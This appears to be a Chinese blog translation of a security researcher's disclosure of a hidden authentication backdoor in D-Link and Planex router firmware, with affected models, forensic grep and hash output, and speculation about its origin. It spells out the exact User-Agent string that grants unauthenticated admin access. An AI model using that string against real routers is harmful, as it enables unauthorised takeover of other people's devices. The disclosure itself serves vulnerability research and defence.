嵌入式设备安全研究员逆向工程出友讯科技(D-Link)路由器固件中的后门。D-Link的固件由其美国子公司Alpha Networks开发。安全研究人员发现,不需要任何验证,只需要浏览器用户代理字符串(User Agent String)是“xmlset_roodkcableoj28840ybtide”(不含引号)就能访问路由器的Web界面,浏览和改变设备设置。受影响的友讯科技路由器型号包括 DIR-100、DI-524、DI-524UP、DI-604S、DI-604UP、DI-604+和TM-G5240等。网友发现,roodkcableoj28840ybtide字符串从后往前读是“Edit by 04882 Joel Backdoor”,其中Joel可能是Alpha Networks的资深技术总监Joel Liu。

以下是NeoAtlantis对http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/这一网址部分内容的摘录和翻译:

根据html源码和一些Shodan搜索结果,有理由认为,以下D-Link设备受到了影响:

Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected:

  • DIR-100
  • DI-524
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240

此外,一些Planex路由似乎也用了同样的固件:

Additionally, several Planex routers also appear to use the same firmware:

  • BRL-04UR
  • BRL-04CW

一个分析

大家好,

(下面的笔记在你们看到的时候可能过时了,但是现在这样吧。/bin/xmlsetc是D-Link后门的接收端。)

Craig今天找到了一个新的D-Link后门,于是我就查看了从他们的FTP站点得到的本地拷贝。他描述,下面的URL解释了他是如何找到它的,并且如何称呼之。我只是补充下。

http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

这一后门看起来只和8个固件相关。我用binwalk从.bix文件中得到了它们。没有.bin或者.img文件看上去包含它们。

Howdy y’all, (These notes will probably be obsolete by the time you read them, but so it goes. The TL;DR is that /bin/xmlsetc is the client for the D-Link backdoor.) Craig exposed a new D-Link backdoor today, so I took a look at all images in my local copy of their FTP site. His article describes the backdoor at the following URL explains how he found it and how to call it. I have just a little to add.

http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

The backdoor seems specific to eight firmware images, which I extracted from .bix files using binwalk. None of the .bin or .img files seem to contain the backdoor.

% grep roodkcab `find . -name webs`
Binary file ./_DIR100_v5.0.0EUb3_patch02.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-alpha-v4-0-0b20.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_di604UP_firmware_103_BETA.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_tm-g5240-alpha-v4-0-0b17.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-b26_320k.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-4.0.0b28.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-alpha-v4.0.0b23.bix.extracted/squashfs-root/bin/webs matches
Binary file ./_TM-G5240-v4-0-0b29.bix.extracted/squashfs-root/bin/webs matches
%

除了/bin/webs包含字符串xmlset_roodkcableoj28840ybtide外,这一字符串也出现在/bin/xmlsetc中。在我的8个镜像中,只有2种xmlsetc的版本,而这8个镜像文件中的每个webs副本都是特别的。

In addition to /bin/webs containing the string “xmlset_roodkcableoj28840ybtide”, it also appears in /bin/xmlsetc. Of my eight images, there are only two unique versions of xmlsetc, while every one of the eight webs copies is distinct.

% md5sum `find . -name xmlsetc` | sort
5c79f358a60280248098db10d6446528 ./_tm-g5240-alpha-v4-0-0b17.bix.extracted/squashfs-root/bin/xmlsetc
5c79f358a60280248098db10d6446528 ./_TM-G5240-alpha-v4-0-0b20.bix.extracted/squashfs-root/bin/xmlsetc
5c79f358a60280248098db10d6446528 ./_TM-G5240-alpha-v4.0.0b23.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_di604UP_firmware_103_BETA.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_DIR100_v5.0.0EUb3_patch02.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_TM-G5240-4.0.0b28.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_TM-G5240-b26_320k.bix.extracted/squashfs-root/bin/xmlsetc
a443b1455ae3db9a572a685da51fabec ./_TM-G5240-v4-0-0b29.bix.extracted/squashfs-root/bin/xmlsetc
% md5sum `find . -name webs` | sort
07abc2afebb8fb90fd650a30f1f0b789 ./_TM-G5240-alpha-v4-0-0b20.bix.extracted/squashfs-root/bin/webs
46637832adbd4056e97ab38aaaf31da4 ./_DIR100_v5.0.0EUb3_patch02.bix.extracted/squashfs-root/bin/webs
78da0913e50b2deb93bc9fe3a8a8d1cd ./_TM-G5240-b26_320k.bix.extracted/squashfs-root/bin/webs
8fe0c80d230bf207bfaeb16b70ef8a45 ./_TM-G5240-v4-0-0b29.bix.extracted/squashfs-root/bin/webs
9318210953eb2dcd6895f091cdc847a1 ./_TM-G5240-alpha-v4.0.0b23.bix.extracted/squashfs-root/bin/webs
9e57fe42a4c1dad21460a13c22356096 ./_tm-g5240-alpha-v4-0-0b17.bix.extracted/squashfs-root/bin/webs
e183a94c5f17bb186d663ac915fe71ff ./_di604UP_firmware_103_BETA.bix.extracted/squashfs-root/bin/webs
ecc427017d2fa3d88faf65fc26d0ab5f ./_TM-G5240-4.0.0b28.bix.extracted/squashfs-root/bin/webs
%

在IDA中看了下xmlsetc,看起来它是在将User-Agent的后门通过printf()函数发送出去,而不是接收它。可能后门有一些正当用途,而Joel只是不够称职,而不是处于恶意?

A quick glance at xmlsetc in IDA shows that it is sending the backdoor User-Agent with printf(), rather than receiving it. Perhaps the backdoor serves some legitimate purpose, and Mystery Joel is only guilty of incompetence and not of malice?

太忙了,不能继续调查。希望你们继续。

I’m too busy to look further, but I hope you neighbors have fun. Cheers from Philly, –TG

对此后门的一个猜测

Travis Goodspeed 指出这个后门被D-Link的固件/bin/xmlsetc程序使用。经过一些搜索,我找到了一些使用xmlsetc进行配置设备设置(例如,动态DNS)的程序。我猜测开发者意识到,一些(路由器上的——译者)程序或者服务需要能自动修改设备的设置。但是因为Web服务器(指路由器上的——译者)已经有了全部的修改这些设置的代码,他们决定只去将这些修改请求送给Web服务器,当他们需要修改一些设定时。问题在于,Web服务器需要用户名和密码登录,而用户是会修改它们的。于是,Joel就站出来说,没关系,我有办法!

The ever neighborly Travis Goodspeed pointed out that this backdoor is used by the /bin/xmlsetc binary in the D-Link firmware. After some grepping, I found several binaries that appear to use xmlsetc to automatically re-configure the device’s settings (example: dynamic DNS). My guess is that the developers realized that some programs/services needed to be able to change the device’s settings automatically; realizing that the web server already had all the code to change these settings, they decided to just send requests to the web server whenever they needed to change something. The only problem was that the web server required a username and password, which the end user could change. Then, in a eureka moment, Joel jumped up and said, “Don’t worry, for I have a cunning plan!”.

此外,一些人在评论中已经报告,DIR-615的一些版本也受到了影响,包括那些由Virgin Mobile分发的路由器。我没确定这些,但看起来是可信的。

Also, several people have reported in the comments that some versions of the DIR-615 are also affected, including those distributed by Virgin Mobile. I have not yet verified this, but it seems quite reasonable.


根据对手头的一个DIR-600M的试验,没有发现以上后门。但是(稍有常识的人都能看出)已经失去对此品牌的信心。